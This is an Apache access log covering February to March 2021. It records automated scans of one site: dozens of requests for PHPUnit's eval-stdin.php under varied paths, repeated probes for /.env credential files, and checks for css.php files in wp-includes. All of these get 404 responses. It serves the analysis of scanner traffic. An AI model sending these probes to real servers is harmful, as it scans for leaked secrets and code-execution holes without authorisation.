85.208.3.18 - - [08/Feb/2021:15:09:14 -0500] "GET /web.public/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:16 -0500] "GET /web.public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:18 -0500] "GET /web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:20 -0500] "GET /webservice_lebong_201901/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:22 -0500] "GET /webservice/firebase/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:25 -0500] "GET /webvarejo-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:27 -0500] "GET /wechatplat/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:29 -0500] "GET /wf/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:31 -0500] "GET /woodfieldestates/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:33 -0500] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:36 -0500] "GET /workspace/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:38 -0500] "GET /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:41 -0500] "GET /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:43 -0500] "GET /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:45 -0500] "GET /wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:47 -0500] "GET /wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:49 -0500] "GET /wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:52 -0500] "GET /wp-content/uploads/2018/01/abc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:54 -0500] "GET /wp-content/wp-plugins/affinipay-payment-gateway/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:56 -0500] "GET /wp-content/wp-plugins/aspose-pdf-importer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:09:58 -0500] "GET /wp-content/wp-plugins/badgeup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:01 -0500] "GET /wp-content/wp-plugins/jannes-mannes-social-media-auto-publisher/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:03 -0500] "GET /wp-content/wp-plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:05 -0500] "GET /wp-content/wp-plugins/message-business/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:08 -0500] "GET /wp-content/wp-plugins/mir-ad-network/base58php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:10 -0500] "GET /wp-content/wp-plugins/product-lister-walmart/marketplaces/walmart/lib/walmart-signature/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:12 -0500] "GET /wp-content/wp-plugins/rollbar/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:15 -0500] "GET /wp-content/wp-plugins/shortcode-tumblr-gallery/includes/lib/Guzzle/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:17 -0500] "GET /wp-content/wp-plugins/turtle-ad-network/base58php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:19 -0500] "GET /wp-content/wp-plugins/user-export-with-their-meta-data/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:21 -0500] "GET /wp-content/wp-plugins/waves-ad-network/base58php/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:23 -0500] "GET /wp-content/wp-plugins/wp-heyloyalty/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:25 -0500] "GET /wp-content/wp-plugins/wptimetoread/vendor/kdaviesnz/timetoread/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:27 -0500] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:28 -0500] "GET /ws/geral/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:30 -0500] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:32 -0500] "GET /wsviamatica/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:35 -0500] "GET /wsviamatica/wszool/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:36 -0500] "GET /wszool/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:39 -0500] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:41 -0500] "GET /xipada/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:43 -0500] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:45 -0500] "GET /yiicarwx/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:47 -0500] "GET /yiiold/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
85.208.3.18 - - [08/Feb/2021:15:10:49 -0500] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
157.230.37.100 - - [09/Feb/2021:04:01:54 -0500] "GET /vendor/phpunit/phpunit/composer.json HTTP/1.1" 404 196 "-" "python-requests/2.25.0"
104.143.83.241 - - [09/Feb/2021:06:34:31 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
188.165.211.206 - - [09/Feb/2021:08:22:54 -0500] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
188.165.211.206 - - [10/Feb/2021:06:33:52 -0500] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36"
104.143.83.241 - - [10/Feb/2021:06:38:41 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [11/Feb/2021:06:04:42 -0500] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
157.55.39.2 - - [11/Feb/2021:12:24:26 -0500] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.175 - - [11/Feb/2021:12:34:30 -0500] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.143.83.241 - - [12/Feb/2021:06:23:38 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [12/Feb/2021:17:09:31 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
138.246.253.24 - - [12/Feb/2021:20:54:06 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [13/Feb/2021:06:02:34 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [13/Feb/2021:10:22:24 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [13/Feb/2021:12:50:08 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
192.145.125.90 - - [13/Feb/2021:18:21:19 -0500] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
144.126.218.128 - - [14/Feb/2021:04:18:01 -0500] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1127.el7.x86_64"
104.143.83.241 - - [14/Feb/2021:06:07:43 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
157.55.39.2 - - [15/Feb/2021:14:19:16 -0500] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.57 - - [15/Feb/2021:14:41:48 -0500] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.143.83.241 - - [15/Feb/2021:17:43:17 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [16/Feb/2021:06:07:38 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
13.66.139.57 - - [17/Feb/2021:02:27:13 -0500] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.143.83.241 - - [17/Feb/2021:05:54:17 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
144.126.218.128 - - [17/Feb/2021:14:53:01 -0500] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1127.el7.x86_64"
104.143.83.241 - - [18/Feb/2021:05:52:22 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
217.160.42.149 - - [18/Feb/2021:09:01:16 -0500] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
138.246.253.24 - - [19/Feb/2021:01:03:21 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [19/Feb/2021:05:52:23 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [19/Feb/2021:17:44:35 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
157.55.39.2 - - [19/Feb/2021:21:42:15 -0500] "GET /robots.txt HTTP/2.0" 404 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.57 - - [19/Feb/2021:21:42:19 -0500] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.143.83.241 - - [20/Feb/2021:06:18:19 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [20/Feb/2021:08:23:39 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [20/Feb/2021:14:43:35 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
82.165.59.181 - - [20/Feb/2021:20:11:58 -0500] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.143.83.241 - - [21/Feb/2021:05:50:47 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
62.4.29.246 - - [21/Feb/2021:20:09:48 -0500] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
62.4.29.246 - - [21/Feb/2021:20:09:49 -0500] "GET /.env HTTP/2.0" 404 196 "-" "python-requests/2.25.1"
104.143.83.241 - - [22/Feb/2021:05:54:03 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [23/Feb/2021:05:52:28 -0500] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [24/Feb/2021:05:48:39 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [25/Feb/2021:05:50:20 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
85.208.3.18 - - [25/Feb/2021:20:59:51 -0500] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
62.210.53.46 - - [26/Feb/2021:02:57:30 -0500] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.143.83.241 - - [26/Feb/2021:05:44:51 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [26/Feb/2021:07:25:37 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
138.246.253.24 - - [26/Feb/2021:09:44:30 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
212.47.251.118 - - [26/Feb/2021:15:07:54 -0500] "GET / HTTP/1.1" 200 5031 "-" "-"
85.208.3.18 - - [26/Feb/2021:19:59:18 -0500] "GET / HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
104.143.83.241 - - [27/Feb/2021:06:10:25 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [27/Feb/2021:07:56:29 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [27/Feb/2021:13:05:51 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [28/Feb/2021:05:51:53 -0500] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
157.55.39.20 - - [28/Feb/2021:09:58:41 -0500] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.57 - - [28/Feb/2021:10:22:46 -0500] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
104.143.83.241 - - [01/Mar/2021:05:51:11 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [02/Mar/2021:05:54:20 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
217.160.45.39 - - [02/Mar/2021:19:33:20 -0500] "GET /wp-includes/css/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
217.160.45.39 - - [02/Mar/2021:19:33:57 -0500] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.143.83.241 - - [03/Mar/2021:05:51:30 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [04/Mar/2021:05:00:52 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [04/Mar/2021:05:49:10 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
165.227.179.88 - - [05/Mar/2021:02:38:53 -0500] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])"
45.55.56.179 - - [05/Mar/2021:02:40:03 -0500] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])"
104.143.83.241 - - [05/Mar/2021:05:47:53 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [05/Mar/2021:14:23:53 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [06/Mar/2021:05:49:13 -0500] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [06/Mar/2021:13:16:41 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
